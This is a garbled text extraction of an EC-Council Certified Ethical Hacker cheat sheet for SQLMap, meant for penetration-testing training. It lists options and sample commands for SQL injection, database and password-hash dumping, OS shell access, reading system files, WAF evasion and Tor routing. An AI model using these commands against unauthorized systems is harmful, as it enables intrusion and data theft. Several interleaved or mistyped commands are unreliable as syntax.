Ethical Hacking and Countermeasures

Certified Ethical Hacker

SQLMap Cheat Sheet

SQLMap
SQLMap is an open-source penetra�on tes�ng tool for detec�ng and exploi�ng SQL injec�on flaws and taking over of database servers. It includes many features such as database fingerprin�ng, over data fetching from the database, accessing
Source: http://sqlmap.org,
https://github.com
the underlying file system and execu�ng commands on the opera�ng system via out-of-band connec�ons

SQLMap Options
Syntax Options Options

python sqlmap [options] -T TBL --ignore-proxy Ignore system default proxy se�ngs
DBMS database table(s) to enumerate
Options
Syntax -C COL --ignore-redirects Ignore redirec�on a�empts
DBMS database table column(s) to enumerate
-u URL
or Target URL --ignore-timeouts Ignore connec�on �meouts
--url=URL --os-shell Prompt for an interac�ve opera�ng system shell

-g GOOGLEDORK Process Google dork results as target URLs --os-pwn Prompt for an OOB shell, Meterpreter or VNC --proxy=PROXY Use a proxy to connect to the target URL

--data=DATA Do not ask for user input, use the default --proxy-cred=PRO.. Specify proxy authen�ca�on creden�als
Send data string through POST --batch
behavior

--cookie=COOKIE HTTP cookie header value --flush-session Flush session files for the current target --proxy-file=PRO.. Load proxy list from a file

--random-agent Use randomly selected HTTP User-Agent header --sqlmap-shell Prompt for an interac�ve sqlmap shell --tor-port=TORPORT Set Tor proxy port other than the default
value
--wizard Simple wizard interface for beginner users --tor-type=TORTYPE Set Tor proxy type
--proxy=PROXY Use a proxy to connect to the target URL
Specify connec�on string for direct database --delay=DELAY Delay in seconds between each HTTP request
--tor Use Tor anonymity network -d DIRECT
connec�on

--check-tor Parse target(s) from Burp or WebScarab proxy --timeout=TIMEOUT Seconds to wait before �meout connec�on
Verify if Tor is used properly -l LOGFILE
log file
Specify the level of tests to perform (1-5, default -m BULKFILE --retries=RETRIES Retries when the connec�on �meouts
--level=LEVEL Scan mul�ple targets given in a textual file
1)
Randomly change the value for a given
--risk=RISK
Specify the risk of tests to perform (1-3, default r REQUESTFILE Load HTTP request from a file --randomize=RPARAM
1) parameter(s)

-c CONFIGFILE Load op�ons from a configura�on INI file --safe-url=SAFEURL The URL address to visit frequently during tes�ng
Specify SQL injec�on techniques to use (default
--technique=TECH
"BEUSTQ")
--method=METHOD Force usage of the given HTTP method --safe-post=SAFE.. POST data to send to a safe URL
-a
or Retrieve everything Specify character used for spli�ng parameter
--all --param-del=PARA.. --safe-req=SAFER.. Load safe HTTP request from a file
values
-b Specify test requests between two visits to a
or Retrieve DBMS banner --cookie-del=COO.. Specify character used for spli�ng cookie values --safe-freq=SAFE..
given safe URL
--banner
Specify a file containing cookies in --skip-urlencode Skip URL encoding of payload data
--load-cookies=L..
--current-user Retrieve DBMS current user Netscape/wget format
Specify parameter used to hold the an�-CSRF
--drop-set-cookie Ignore Set-Cookie header from the response --csrf-token=CSR..
token
--current-db Retrieve DBMS current database
Specify URL address to visit for extrac�on of
--user-agent=AGENT Specify HTTP User-Agent header value --csrf-url=CSRFURL
an�-CSRF token
--passwords Enumerate DBMS user’s password hashes
--host=HOST Specify HTTP Host header value --force-ssl Force usage of SSL/HTTPS

--tables Enumerate DBMS database tables

--referer=REFERER Specify HTTP Referer header value --hpp Use HTTP parameter pollu�on method

-H HEADER Evaluate provided Python code before the

--columns Enumerate DBMS database table columns or Specify Extra header --eval=EVALCODE
request
--hea..
--schema Enumerate DBMS schema --headers=HEADERS Specify Extra headers -o Turn on all op�miza�on switches

--auth-type=AUTH.. Specify HTTP authen�ca�on type --predict-output Predict common queries output
--dump Dump DBMS database table entries

--auth-cred=AUTH.. Specify HTTP authen�ca�on creden�als --keep-alive Use persistent HTTP(s) connec�ons
--dump-all Dump all DBMS databases tables entries
Specify HTTP authen�ca�on PEM cert/private Retrieve page length without the actual HTTP
--auth-file=AUTH.. --null-connection
key file response body
-D DB DBMS database to enumerate
Specify max number of concurrent HTTP(s)
--ignore-code=IG.. Ignore (problema�c) HTTP error code (e.g. 401) --threads=THREADS
requests (default 1)

www.eccouncil.org/ceh Over 50% Of Professionals Received Promo�ons a�er C|EH 01


Certified Ethical Hacker
Syntax
-p TESTPARAMETER
--skip=SKIP
--skip-static
--param-exclude=..
--dbms=DBMS
--dbms-cred=DBMS..
--os=OS
--invalid-bignum
--invalid-logical
--invalid-string
--no-cast
--no-escape
--prefix=PREFIX
--suffix=SUFFIX
--tamper=TAMPER
--string=STRING
--not-string=NOT..
--regexp=REGEXP
--code=CODE
--text-only
--titles
--time-sec=TIMESEC
--union-cols=UCOLS
--union-char=UCHAR
--union-from=UFROM
--dns-domain=DNS..
--second-url=SEC..
www.eccouncil.org/ceh
Ethical Hacking and Countermeasures
SQLMap Cheat Sheet
Options Options
--second-req=SEC.. --file-dest=FILE.. Back-end DBMS absolute file path to write to
Specify testable parameter(s) Load second-order HTTP request from the file
-f
Skip tes�ng for a given parameter(s) or --os-cmd=OSCMD Execute an opera�ng system command
Perform an extensive DBMS version fingerprint
--fingerprint
One-click prompts for an OOB shell, Meterpreter
Skip tes�ng parameters that do not appear to be --os-smbrelay
--hostname Retrieve DBMS server hostname or VNC
dynamic
Specify regexp to exclude parameters from --os-bof Stored procedure buffer overflow exploita�on
--is-dba Detect if the DBMS current user is DBA
tes�ng
Specify regexp to exclude parameters from --users Enumerate DBMS users --priv-esc Database process user privilege escala�on
tes�ng
The local path where Metasploit Framework is
--privileges Enumerate DBMS users’ privileges --msf-path=MSFPATH
Force back-end DBMS to the provided value installed
The remote absolute path of temporary files
--roles Enumerate DBMS users’ roles --tmp-path=TMPPATH
Specify DBMS authen�ca�on creden�als directory
Force back-end DBMS opera�ng system to the --dbs Enumerate DBMS databases --reg-read Read a Windows registry key value
provided value
--count Retrieve the number of entries for the table(s) --reg-add Write a Windows registry key value data
Use big numbers for invalida�ng values
Search column(s), table(s) and/or database --reg-del Delete a Windows registry key value
Use random strings for invalida�ng values --search
name(s)
--comments Check for DBMS comments during enumera�on --reg-key=REGKEY Windows registry key
Turn off payload cas�ng mechanism
-X EXCLUDE DBMS database iden�fier(s) to not enumerate --reg-value=REGVAL Windows registry key value
Turn off string escaping mechanism
-U USER DBMS user to enumerate --reg-data=REGDATA Windows registry key value data
Injec�on payload prefix string
Exclude DBMS system databases when --reg-type=REGTYPE Windows registry key value type
--exclude-sysdbs
enumera�ng tables
Injec�on payload suffix string
--pivot-column=P.. Pivot column name -s SESSIONFILE Load session from a stored (.sqlite) file
Use given script(s) for tampering injec�on data
--where=DUMPWHERE Use WHERE condi�on while table dumping -t TRAFFICFILE Log all HTTP traffic into a textual file
Specify the string to match when the query is
evaluated to True
--start=LIMITSTART First dump table entry to retrieve --binary-fields=.. Specify result fields having binary values
Specify the string to match when the query is
evaluated to False Verify Internet connec�on before assessing the
--stop=LIMITSTOP Last dump table entry to retrieve --check-internet
target
Specify regexp to match when the query is
evaluated to True --first=FIRSTCHAR --crawl=CRAWLDEPTH Crawl the website star�ng from the target URL
First query output word character to retrieve
Specify HTTP code to match when the query is
evaluated to True --last=LASTCHAR Last query output word character to retrieve --crawl-exclude=.. Specify regexp to exclude pages from crawling
Compare pages based only on the textual --csv-del=CSVDEL Specify delimi�ng character used in CSV output
content --sql-query=QUERYR Specify SQL statement to be executed
Compare pages based only on their �tles --sql-shell Prompt for an interac�ve SQL shell --charset=CHARSET Specify blind SQL injec�on charset
Specify seconds to delay the DBMS response --sql-file=SQLFILE Execute SQL statements from a given file(s) --dump-format=DU.. Specify format of dumped data
Specify character encoding used for data
Specify a range of columns to test for UNION --common-tables Verify the existence of common tables --encoding=ENCOD..
retrieval
query SQL injec�on
Display for each output the es�mated �me of
--common-columns Verify the existence of common columns --eta
Specify character to use for brute-forcing arrival
number of columns
--udf-inject Inject custom user-defined func�ons --forms Parse and test forms on target URL
Specify table to use in FROM part of UNION
query SQL injec�on
--shared-lib=SHLIB Local path of the shared library --fresh-queries Ignore query results stored in the session file
Specify domain name used for DNS exfiltra�on
a�ack
--file-read=FILE.. Read a file from the back-end DBMS file system --har=HARFILE Log all HTTP traffic into a HAR file
Resul�ng page URL searched for a second-order
response Write a local file on the back-end DBMS file --hex
--file-write=FIL.. Use hex conversion during data retrieval
system
97% Of Professionals Stated That Skills Acquired in C|EH Helped Safeguard Their Organiza�ons 02

Certified Ethical Hacker
SQLMap Commands
Command
sqlmap -u <Target URL> -p id
sqlmap -u <Target URL>–
data=”user=admin&password=admin
” -p user
sqlmap -u <Target URL> –
cookie=”cookie value”
sqlmap -u <Target URL> –crawl=1
sqlmap -u <Target URL> -p id –
proxy=”http://localhost:8080″
sqlmap -u <Target URL> --crawl3
--batch
sqlmap -u <Target URL> --forms
sqlmap -u <Target URL> --dbs –
threads=5
sqlmap -u <Target URL> -v 3
sqlmap -u <Target URL> --dbs
python sqlmap -u <Target URL> -
-
tamper=apostrophemask,apostroph
enullencode
sqlmap -u <Target URL> –os-
shell
sqlmap -u <Target URL> –os-cmd
<cmd>
sqlmap -u <Target URL> –sql-
shell
sqlmap -u <Target URL> –auth-
type Basic –auth-cred
“admin:admin”
sqlmap -u <Target URL> —auth-
file=<path to PEM certificate
or private key file>
sqlmap -u <Target URL> –tor
sqlmap -u <Target URL>–tor-
port=<tor proxy port>
sqlmap -u <Target URL> –delay=1
#1 second delay
sqlmap -u <Target URL> –csrf-
token=<csrf token>
sqlmap -r
/root/Desktop/Burp.txt –second-
order “<Target URL>”
python sqlmap.py -u <Target
URL> –is-dba -v 1
python sqlmap.py -u <Target
URL> –users -v 0
python sqlmap.py -u <Target
URL> –passwords -v 0
or
python sqlmap.py -u <Target
URL> –passwords -U sa -v 0
www.eccouncil.org/ceh
Ethical Hacking and Countermeasures
SQLMap Cheat Sheet
Description Command Description
Scans GET Request python sqlmap.py -u <Target
URL> –privileges -v 0
or
Scans POST Request To view the user permissions
python sqlmap.py -u <Target
URL> –privileges -U postgres -v
0
Scans POST Login Pages
python sqlmap.py -u <Target
Defines a depth to crawl URL> –dbs -v 0 dbs can use the database
python sqlmap.py -u <Target
SQLMap Through Proxy
URL> –tables -D Tables column in a table
“information_scheam”
The batch command to use the default value to
proceed without asking the user python sqlmap.py -u <Target
URL> –columns -T “user” -D Columns are listed in the table column names
Form command to parse the page and guide the “mysql” -v 1
user to test the iden�fied fields python sqlmap.py -u <Target
URL> –dump -T “users” -D
Dump the contents of the column specified in
Threads command to define the number of the list
“testdb”
concurrent requests to be sent by the SQLMap
tool python sqlmap.py -u <Target
URL> –dump-all -v 0 dumap-all List all databases, all tables content
Verbose to see the payload being sent by the
tool python sqlmap.py -u <Target File to read the content of the document
URL> –file / etc / password [load_file () func�on]
Database Enumera�on
python sqlmap.py -u <Target
URL> –sql-shell Execute SQL
To Bypass WAF python sqlmap.py -u <Target
URL> –method POST –data “id = POST submission
1”
Run system commands for Linux server python sqlmap.py -u <Target
URL> –cookie “id = 1” -v 1 COOKIE Submit
Run system commands for windows server python sqlmap.py -u <Target
URL> –refer “url” -v 3 Refer to deceive
Run SQL queries python sqlmap.py -u <Target
URL> –user-agent “Mozilla / 4.0
(compatible; MSIE 7.0; Windows
Scans a page protected by HTTP authen�ca�on
NT 5.1)” -v 3
like Basic, NTLM, and Digest Using a custom user-agent or user-agents.txt
or
python sqlmap.py -u <Target
Scans a page protected by a key-based
URL> -v 1 -a “./txt/user-
authen�ca�on agents.txt”
To use the default Tor anonymity network python sqlmap.py -u <Target
URL> -v 1 –current-user – Use of mul�threading guess solu�on
To define a Tor port threads 3
python sqlmap.py -u <Target Specify the database, bypassing the automa�c
If a delay is required between each HTTP URL> -v 2 –dbms “PostgreSQL” detec�on SQLMAP
request
python sqlmap.py -u <Target Specifies the opera�ng system automa�cally
URL> -v 2 –os “Windows”
Including CSRF token in the command detects the bypass SQLMAP
python sqlmap.py -u <Target
URL> -v 3 -p “id” –prefix ” ‘” Prefix and –pos�ix custom payload
Second-Order SQL injec�on –postfix “and’ test ‘=’ test”
python sqlmap.py -u <Target
Union injec�on test
Analyzing that the current user is dba URL> –union-test -v -1
python sqlmap.py -u <Target
User list database management system URL> –union-test –union-tech With the order by
orderby -v 1
python sqlmap –u "<Target URL>"
--cookies= --data= Parsing directly into SQLMap
Database user password
python sqlmap -u "<Target URL>"
Increase the Risk and Level value
--risk=3 --level=5
97% Of Professionals Found C|EH Labs to Accurately Mimic Real-World Cyber Threats 03